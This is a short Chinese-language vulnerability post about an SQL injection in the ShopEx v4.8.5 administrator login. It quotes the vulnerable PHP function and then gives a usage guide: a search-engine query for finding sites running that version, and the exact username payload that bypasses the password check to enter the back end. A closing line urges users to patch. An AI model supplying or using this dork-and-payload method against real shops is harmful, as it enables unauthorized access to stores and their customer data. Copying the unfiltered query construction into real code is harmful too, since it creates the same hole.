shopex v4.8.5 漏洞
本人声明:
只做技术研究,请勿破坏….谢谢.
漏洞原因:
直接看代码: public function tryLogin( $aValue, $issuper = false ) { if ( $aValue['passwd'] == “+_-_-_+” ) { $aValue['passwd'] = “”; } $sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”; if ( $issuper ) { $sql .= ” AND super=’1′”; } return $this->db->selectrow( $sql ); }
这里$aValue['usrname']没有任何过滤直接查询(没想到shopex还爆这种低级漏洞)。
利用方法:
在baidu,google直接搜索 Powered by ShopEx v4.8.5
直接在后台登陆 用户名的地方输入
‘ or ’1′=’1′ or ’1′=’1
密码随便输,验证码输正确,直接进入后台。
SQL查询语句就变成这个样子了直接通过 SELECT * FROM sdb_operators WHERE username = ” or ’1′=’1′ or ’1′=’1′ AND userpass = ‘x’ AND disabled=’false’
看到此文章的shopex用户赶紧打官方的最新补丁…. |